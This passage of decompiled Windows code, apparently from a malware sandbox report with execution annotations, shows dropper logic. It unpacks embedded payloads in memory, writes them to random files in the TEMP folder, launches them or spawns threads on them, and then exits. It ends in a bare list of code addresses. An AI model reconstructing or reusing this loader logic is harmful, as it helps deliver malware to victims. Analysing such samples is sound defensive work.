                                                                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x117e284; // 0x1
                                                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                                                            									goto L22;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t508 = _v20;
                                                                                                                                                                                                                                                                            								__eflags =  *(_t508 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                            								if(( *(_t508 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                            									goto L22;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								__eflags =  *0x118435d & 0x000000ff;
                                                                                                                                                                                                                                                                            								if(( *0x118435d & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            									goto L22;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t509 = _v20;
                                                                                                                                                                                                                                                                            								__eflags =  *(_t509 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                            								if(( *(_t509 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            									_t433 = E01171EE0(_v28, 0xea60);
                                                                                                                                                                                                                                                                            									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                            									_v8 = _t433 & 0x000000ff;
                                                                                                                                                                                                                                                                            									L21:
                                                                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v44 =  *((intOrPtr*)(_v28 + _v32 - 4));
                                                                                                                                                                                                                                                                            								_v40 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                            								__eflags = _v40;
                                                                                                                                                                                                                                                                            								if(_v40 == 0) {
                                                                                                                                                                                                                                                                            									L19:
                                                                                                                                                                                                                                                                            									goto L21;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t439 = E01176260(_v40, _v28, _v32, _v40, _v44);
                                                                                                                                                                                                                                                                            								__eflags = _t439 - _v44;
                                                                                                                                                                                                                                                                            								if(_t439 == _v44) {
                                                                                                                                                                                                                                                                            									_t442 = E01171EE0(_v40, 0xea60);
                                                                                                                                                                                                                                                                            									_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                            									_v8 = _t442 & 0x000000ff;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								VirtualFree(_v40, 0, 0x8000);
                                                                                                                                                                                                                                                                            								goto L19;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v36 =  *_v20;
                                                                                                                                                                                                                                                                            								_v20 = _v20 + _v36;
                                                                                                                                                                                                                                                                            								if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									return 0;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_v13 = 0;
                                                                                                                                                                                                                                                                            						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                            						_v48 = 0;
                                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                                            							__eflags = _v48 - _v12;
                                                                                                                                                                                                                                                                            							if(_v48 >= _v12) {
                                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							__eflags = _v48;
                                                                                                                                                                                                                                                                            							if(_v48 <= 0) {
                                                                                                                                                                                                                                                                            								L29:
                                                                                                                                                                                                                                                                            								_v52 = _v20 + 0x18;
                                                                                                                                                                                                                                                                            								_v56 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x117e274; // 0x2
                                                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                                                            									L39:
                                                                                                                                                                                                                                                                            									_t448 = _v20;
                                                                                                                                                                                                                                                                            									__eflags =  *(_t448 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                            									if(( *(_t448 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                            										__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x117e270; // 0x1
                                                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                                                            											L90:
                                                                                                                                                                                                                                                                            											__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x117e278; // 0x3
                                                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                                                            												L93:
                                                                                                                                                                                                                                                                            												__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x117e27c; // 0x4
                                                                                                                                                                                                                                                                            												if(__eflags == 0) {
                                                                                                                                                                                                                                                                            													_v13 = 1;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												L95:
                                                                                                                                                                                                                                                                            												L24:
                                                                                                                                                                                                                                                                            												_t452 = _v48 + 1;
                                                                                                                                                                                                                                                                            												__eflags = _t452;
                                                                                                                                                                                                                                                                            												_v48 = _t452;
                                                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x117e288; // 0x2
                                                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                                                            												goto L93;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_t317 =  *0x117e28c; // 0x1183f88
                                                                                                                                                                                                                                                                            											_t455 =  *0x11818a0; // 0x1183b88
                                                                                                                                                                                                                                                                            											E0117A360(_t455, _t317, _v52, _v56);
                                                                                                                                                                                                                                                                            											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                            											goto L95;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x117e284; // 0x1
                                                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                                                            											goto L90;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_t321 = E01177250(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                            										_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                            										__eflags = _t321 & 0x000000ff;
                                                                                                                                                                                                                                                                            										if((_t321 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            											_t528 = _v20;
                                                                                                                                                                                                                                                                            											__eflags =  *(_t528 + 0x14);
                                                                                                                                                                                                                                                                            											if( *(_t528 + 0x14) == 0) {
                                                                                                                                                                                                                                                                            												L48:
                                                                                                                                                                                                                                                                            												_t529 = _v20;
                                                                                                                                                                                                                                                                            												__eflags =  *(_t529 + 0xc) & 0x00000001;
                                                                                                                                                                                                                                                                            												if(( *(_t529 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                            													GetEnvironmentVariableA("TEMP",  &_v1196, 0x104);
                                                                                                                                                                                                                                                                            													E01177D20( &_v932,  &_v932, 0, 0xa);
                                                                                                                                                                                                                                                                            													E01179730( &_v932, 4);
                                                                                                                                                                                                                                                                            													_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                            													GetTempFileNameA( &_v1196,  &_v932, GetTickCount() % 0xffff,  &_v916);
                                                                                                                                                                                                                                                                            													_v920 = CreateFileA( &_v916, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                            													__eflags = _v920 - 0xffffffff;
                                                                                                                                                                                                                                                                            													if(_v920 == 0xffffffff) {
                                                                                                                                                                                                                                                                            														L89:
                                                                                                                                                                                                                                                                            														goto L24;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													_v1200 = 0;
                                                                                                                                                                                                                                                                            													_v1204 = 0;
                                                                                                                                                                                                                                                                            													_v1208 = _v56;
                                                                                                                                                                                                                                                                            													_t333 = _v20;
                                                                                                                                                                                                                                                                            													__eflags =  *(_t333 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                            													if(( *(_t333 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            														_v1204 = WriteFile(_v920, _v52, _v56,  &_v1200, 0);
                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                            														_v1216 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                            														_v1212 = VirtualAlloc(0, _v1216, 0x3000, 4);
                                                                                                                                                                                                                                                                            														__eflags = _v1212;
                                                                                                                                                                                                                                                                            														if(_v1212 != 0) {
                                                                                                                                                                                                                                                                            															_t349 = E01176260(_v56, _v52, _v56, _v1212, _v1216);
                                                                                                                                                                                                                                                                            															__eflags = _t349 - _v1216;
                                                                                                                                                                                                                                                                            															if(_t349 == _v1216) {
                                                                                                                                                                                                                                                                            																_v1204 = WriteFile(_v920, _v1212, _v1216,  &_v1200, 0);
                                                                                                                                                                                                                                                                            																_v1208 = _v1216;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															VirtualFree(_v1212, 0, 0x8000);
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													__eflags = _v1204;
                                                                                                                                                                                                                                                                            													if(_v1204 == 0) {
                                                                                                                                                                                                                                                                            														L88:
                                                                                                                                                                                                                                                                            														CloseHandle(_v920);
                                                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                                                            														__eflags = _v1200 - _v1208;
                                                                                                                                                                                                                                                                            														if(_v1200 != _v1208) {
                                                                                                                                                                                                                                                                            															goto L88;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														CloseHandle(_v920);
                                                                                                                                                                                                                                                                            														_t340 = E01171E60( &_v916);
                                                                                                                                                                                                                                                                            														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                            														_v1220 = _t340;
                                                                                                                                                                                                                                                                            														__eflags = _v1220;
                                                                                                                                                                                                                                                                            														if(_v1220 != 0) {
                                                                                                                                                                                                                                                                            															_t465 = _v20;
                                                                                                                                                                                                                                                                            															__eflags =  *(_t465 + 0x10);
                                                                                                                                                                                                                                                                            															if( *(_t465 + 0x10) != 0) {
                                                                                                                                                                                                                                                                            																E011773C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                            																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															_t539 = _v20;
                                                                                                                                                                                                                                                                            															__eflags =  *(_t539 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                            															if(( *(_t539 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            																E01172510(_v1220, 0x117e290);
                                                                                                                                                                                                                                                                            																_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            															_v8 = 1;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													goto L89;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												_v636 = 0;
                                                                                                                                                                                                                                                                            												_v632 = 0;
                                                                                                                                                                                                                                                                            												_v640 = 0;
                                                                                                                                                                                                                                                                            												_t472 = _v20;
                                                                                                                                                                                                                                                                            												__eflags =  *(_t472 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                            												if(( *(_t472 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            													_t355 = E01172070(_v52);
                                                                                                                                                                                                                                                                            													_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                            													_v636 = _t355;
                                                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                                                            													_v640 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                            													_t378 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            													_v644 = _t378;
                                                                                                                                                                                                                                                                            													__eflags = _v644;
                                                                                                                                                                                                                                                                            													if(_v644 != 0) {
                                                                                                                                                                                                                                                                            														_t381 = E01176260(_v644, _v52, _v56, _v644, _v640);
                                                                                                                                                                                                                                                                            														__eflags = _t381 - _v640;
                                                                                                                                                                                                                                                                            														if(_t381 == _v640) {
                                                                                                                                                                                                                                                                            															_t383 = E01172070(_v644); // executed
                                                                                                                                                                                                                                                                            															_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                            															_v636 = _t383;
                                                                                                                                                                                                                                                                            															_t563 = _v20;
                                                                                                                                                                                                                                                                            															__eflags =  *(_t563 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                            															if(( *(_t563 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                            																_t386 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            																_v632 = _t386;
                                                                                                                                                                                                                                                                            																E01177B70(_v632, _v644, _v640);
                                                                                                                                                                                                                                                                            																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														VirtualFree(_v644, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												__eflags = _v636;
                                                                                                                                                                                                                                                                            												if(_v636 != 0) {
                                                                                                                                                                                                                                                                            													_t473 = _v20;
                                                                                                                                                                                                                                                                            													__eflags =  *(_t473 + 0x10);
                                                                                                                                                                                                                                                                            													if( *(_t473 + 0x10) != 0) {
                                                                                                                                                                                                                                                                            														E011773C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                            														_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													_t549 = _v20;
                                                                                                                                                                                                                                                                            													__eflags =  *(_t549 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                            													if(( *(_t549 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                            														_t361 = E011797A0(0x10);
                                                                                                                                                                                                                                                                            														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                            														_v1228 = _t361;
                                                                                                                                                                                                                                                                            														_v648 = _v1228;
                                                                                                                                                                                                                                                                            														_t551 = _v20;
                                                                                                                                                                                                                                                                            														__eflags =  *(_t551 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                            														if(( *(_t551 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                            															 *_v648 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                            															__eflags =  *_v648;
                                                                                                                                                                                                                                                                            															if( *_v648 != 0) {
                                                                                                                                                                                                                                                                            																E01177B70( *_v648, _v52, _v56);
                                                                                                                                                                                                                                                                            																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                            																 *(_v648 + 4) = _v56;
                                                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                                                            															 *_v648 = _v632;
                                                                                                                                                                                                                                                                            															 *(_v648 + 4) = _v640;
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            														__eflags =  *_v648;
                                                                                                                                                                                                                                                                            														if( *_v648 != 0) {
                                                                                                                                                                                                                                                                            															 *((intOrPtr*)(_v648 + 8)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                            															 *((intOrPtr*)(_v648 + 0xc)) = _v636;
                                                                                                                                                                                                                                                                            															_t368 = CreateThread(0, 0, E011777B0, _v648, 0, 0); // executed
                                                                                                                                                                                                                                                                            															_v652 = _t368;
                                                                                                                                                                                                                                                                            															CloseHandle(_v652);
                                                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													_t550 = _v20;
                                                                                                                                                                                                                                                                            													__eflags =  *(_t550 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                            													if(( *(_t550 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                            														E01172510(_v636, 0x117e290);
                                                                                                                                                                                                                                                                            														_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                                                            													_v8 = 1;
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												goto L24;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_v620 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                            											__eflags = _v620;
                                                                                                                                                                                                                                                                            											if(_v620 == 0) {
                                                                                                                                                                                                                                                                            												goto L48;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											E01177B70(_v620, _v52, _v56);
                                                                                                                                                                                                                                                                            											_t393 = E011797A0(0x20);
                                                                                                                                                                                                                                                                            											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                            											_v1224 = _t393;
                                                                                                                                                                                                                                                                            											_v624 = _v1224;
                                                                                                                                                                                                                                                                            											 *_v624 =  *_v20;
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v624 + 4)) =  *((intOrPtr*)(_v20 + 4));
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v624 + 8)) =  *((intOrPtr*)(_v20 + 8));
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v624 + 0x14)) =  *((intOrPtr*)(_v20 + 0x14));
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v624 + 0x1c)) = _v56;
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v624 + 0xc)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v624 + 0x10)) =  *((intOrPtr*)(_v20 + 0x10));
                                                                                                                                                                                                                                                                            											 *(_v624 + 0x18) = _v620;
                                                                                                                                                                                                                                                                            											_v628 = CreateThread(0, 0, E01176DA0, _v624, 0, 0);
                                                                                                                                                                                                                                                                            											CloseHandle(_v628);
                                                                                                                                                                                                                                                                            											goto L24;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										goto L24;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L24;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x117e284; // 0x1
                                                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                                                            									goto L39;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                            								E01177D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                            								E01179730( &_v340, 4);
                                                                                                                                                                                                                                                                            								_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                            								GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                            								_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                                            								__eflags = _v328 - 0xffffffff;
                                                                                                                                                                                                                                                                            								if(_v328 == 0xffffffff) {
                                                                                                                                                                                                                                                                            									goto L39;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v608 = 0;
                                                                                                                                                                                                                                                                            								_v612 = 0;
                                                                                                                                                                                                                                                                            								_t415 = WriteFile(_v328, _v52, _v56,  &_v612, 0);
                                                                                                                                                                                                                                                                            								__eflags = _t415;
                                                                                                                                                                                                                                                                            								if(_t415 == 0) {
                                                                                                                                                                                                                                                                            									L37:
                                                                                                                                                                                                                                                                            									__eflags = _v608;
                                                                                                                                                                                                                                                                            									if(_v608 == 0) {
                                                                                                                                                                                                                                                                            										CloseHandle(_v328);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									goto L39;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								__eflags = _v612 - _v56;
                                                                                                                                                                                                                                                                            								if(_v612 != _v56) {
                                                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v608 = CloseHandle(_v328);
                                                                                                                                                                                                                                                                            								E01176C60();
                                                                                                                                                                                                                                                                            								_t421 = E01171E60( &_v324);
                                                                                                                                                                                                                                                                            								_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                            								_v616 = _t421;
                                                                                                                                                                                                                                                                            								__eflags = _v616;
                                                                                                                                                                                                                                                                            								if(_v616 == 0) {
                                                                                                                                                                                                                                                                            									E01176CF0();
                                                                                                                                                                                                                                                                            									goto L37;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								E011774A0();
                                                                                                                                                                                                                                                                            								ExitProcess(0);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v60 =  *_v20;
                                                                                                                                                                                                                                                                            							_v20 = _v20 + _v60;
                                                                                                                                                                                                                                                                            							__eflags = _v20 - _a4 + _a8;
                                                                                                                                                                                                                                                                            							if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                            								goto L29;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						__eflags = (_v13 & 0x000000ff) - 1;
                                                                                                                                                                                                                                                                            						if((_v13 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                            							 *0x11830e4 = 1;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *0x11830e4 = 2;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L99;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}
















































































                                                                                                                                                                                                                                                                            0x011762b9
                                                                                                                                                                                                                                                                            0x011762c4
                                                                                                                                                                                                                                                                            0x01176c4e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x011762d4
                                                                                                                                                                                                                                                                            0x011762d9
                                                                                                                                                                                                                                                                            0x011762e0
                                                                                                                                                                                                                                                                            0x011762f9
                                                                                                                                                                                                                                                                            0x011762fc
                                                                                                                                                                                                                                                                            0x0117630e
                                                                                                                                                                                                                                                                            0x0117631e
                                                                                                                                                                                                                                                                            0x01176343
                                                                                                                                                                                                                                                                            0x01176349
                                                                                                                                                                                                                                                                            0x01176354
                                                                                                                                                                                                                                                                            0x0117635d
                                                                                                                                                                                                                                                                            0x01176363
                                                                                                                                                                                                                                                                            0x01176429
                                                                                                                                                                                                                                                                            0x01176308
                                                                                                                                                                                                                                                                            0x01176308
                                                                                                                                                                                                                                                                            0x0117630b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117630b
                                                                                                                                                                                                                                                                            0x0117636f
                                                                                                                                                                                                                                                                            0x01176375
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117637b
                                                                                                                                                                                                                                                                            0x01176381
                                                                                                                                                                                                                                                                            0x01176384
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176391
                                                                                                                                                                                                                                                                            0x01176393
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176399
                                                                                                                                                                                                                                                                            0x0117639f
                                                                                                                                                                                                                                                                            0x011763a2
                                                                                                                                                                                                                                                                            0x01176419
                                                                                                                                                                                                                                                                            0x0117641e
                                                                                                                                                                                                                                                                            0x01176424
                                                                                                                                                                                                                                                                            0x01176427
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176427
                                                                                                                                                                                                                                                                            0x011763ad
                                                                                                                                                                                                                                                                            0x011763c3
                                                                                                                                                                                                                                                                            0x011763c6
                                                                                                                                                                                                                                                                            0x011763ca
                                                                                                                                                                                                                                                                            0x0117640e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117640e
                                                                                                                                                                                                                                                                            0x011763dc
                                                                                                                                                                                                                                                                            0x011763e1
                                                                                                                                                                                                                                                                            0x011763e4
                                                                                                                                                                                                                                                                            0x011763ef
                                                                                                                                                                                                                                                                            0x011763f4
                                                                                                                                                                                                                                                                            0x011763fa
                                                                                                                                                                                                                                                                            0x011763fa
                                                                                                                                                                                                                                                                            0x01176408
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176320
                                                                                                                                                                                                                                                                            0x01176325
                                                                                                                                                                                                                                                                            0x0117632e
                                                                                                                                                                                                                                                                            0x0117633a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117633c
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117633c
                                                                                                                                                                                                                                                                            0x0117633a
                                                                                                                                                                                                                                                                            0x0117631e
                                                                                                                                                                                                                                                                            0x0117642e
                                                                                                                                                                                                                                                                            0x01176438
                                                                                                                                                                                                                                                                            0x0117643b
                                                                                                                                                                                                                                                                            0x0117644d
                                                                                                                                                                                                                                                                            0x01176450
                                                                                                                                                                                                                                                                            0x01176453
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176459
                                                                                                                                                                                                                                                                            0x0117645d
                                                                                                                                                                                                                                                                            0x01176482
                                                                                                                                                                                                                                                                            0x01176488
                                                                                                                                                                                                                                                                            0x01176493
                                                                                                                                                                                                                                                                            0x0117649c
                                                                                                                                                                                                                                                                            0x011764a2
                                                                                                                                                                                                                                                                            0x011765f3
                                                                                                                                                                                                                                                                            0x011765f3
                                                                                                                                                                                                                                                                            0x011765f9
                                                                                                                                                                                                                                                                            0x011765fc
                                                                                                                                                                                                                                                                            0x01176609
                                                                                                                                                                                                                                                                            0x0117660f
                                                                                                                                                                                                                                                                            0x01176bdd
                                                                                                                                                                                                                                                                            0x01176be3
                                                                                                                                                                                                                                                                            0x01176be9
                                                                                                                                                                                                                                                                            0x01176c18
                                                                                                                                                                                                                                                                            0x01176c1e
                                                                                                                                                                                                                                                                            0x01176c24
                                                                                                                                                                                                                                                                            0x01176c26
                                                                                                                                                                                                                                                                            0x01176c26
                                                                                                                                                                                                                                                                            0x01176c2a
                                                                                                                                                                                                                                                                            0x01176444
                                                                                                                                                                                                                                                                            0x01176447
                                                                                                                                                                                                                                                                            0x01176447
                                                                                                                                                                                                                                                                            0x0117644a
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0117644a
                                                                                                                                                                                                                                                                            0x01176bf1
                                                                                                                                                                                                                                                                            0x01176bf7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176c01
                                                                                                                                                                                                                                                                            0x01176c07
                                                                                                                                                                                                                                                                            0x01176c0e
                                                                                                                                                                                                                                                                            0x01176c13
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176c13
                                                                                                                                                                                                                                                                            0x0117661b
                                                                                                                                                                                                                                                                            0x01176621
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176633
                                                                                                                                                                                                                                                                            0x01176638
                                                                                                                                                                                                                                                                            0x0117663e
                                                                                                                                                                                                                                                                            0x01176640
                                                                                                                                                                                                                                                                            0x01176647
                                                                                                                                                                                                                                                                            0x0117664a
                                                                                                                                                                                                                                                                            0x0117664e
                                                                                                                                                                                                                                                                            0x01176752
                                                                                                                                                                                                                                                                            0x01176752
                                                                                                                                                                                                                                                                            0x01176758
                                                                                                                                                                                                                                                                            0x0117675b
                                                                                                                                                                                                                                                                            0x011769cb
                                                                                                                                                                                                                                                                            0x011769dc
                                                                                                                                                                                                                                                                            0x011769ed
                                                                                                                                                                                                                                                                            0x011769f2
                                                                                                                                                                                                                                                                            0x01176a1a
                                                                                                                                                                                                                                                                            0x01176a3c
                                                                                                                                                                                                                                                                            0x01176a42
                                                                                                                                                                                                                                                                            0x01176a49
                                                                                                                                                                                                                                                                            0x01176bd6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x01176bd6
                                                                                                                                                                                                                                                                            0x01176a4f
                                                                                                                                                                                                                                                                            0x01176a59
                                                                                                                                                                                                                                                                            0x01176a66
                                                                                                                                                                                                                                                                            0x01176a6c
                                                                                                                                                                                                                                                                            0x01176a72
                                                                                                                                                                                                                                                                            0x01176a75
                                                                                                                                                                                                                                                                            0x01176b3c
                                                                                                                                                                                                                                                                            0x01176a7b
                                                                                                                                                                                                                                                                            0x01176a84
                                                                                                                                                                                                                                                                            0x01176aa0
                                                                                                                                                                                                                                                                            0x01176aa6
                                                                                                                                                                                                                                                                            0x01176aad
                                                                                                                                                                                                                                                                            0x01176ac5
                                                                                                                                                                                                                                                                            0x01176aca
                                                                                                                                                                                                                                                                            0x01176ad0
                                                                                                                                                                                                                                                                            0x01176af6
                                                                                                                                                                                                                                                                            0x01176b02
                                                                                                                                                                                                                                                                            0x01176b02
                                                                                                                                                                                                                                                                            0x01176b16
                                                                                                                                                                                                                                                                            0x01176b16
                                                                                                                                                                                                                                                                            0x01176b1c
                                                                                                                                                                                                                                                                            0x01176b42
                                                                                                                                                                                                                                                                            0x01176b49
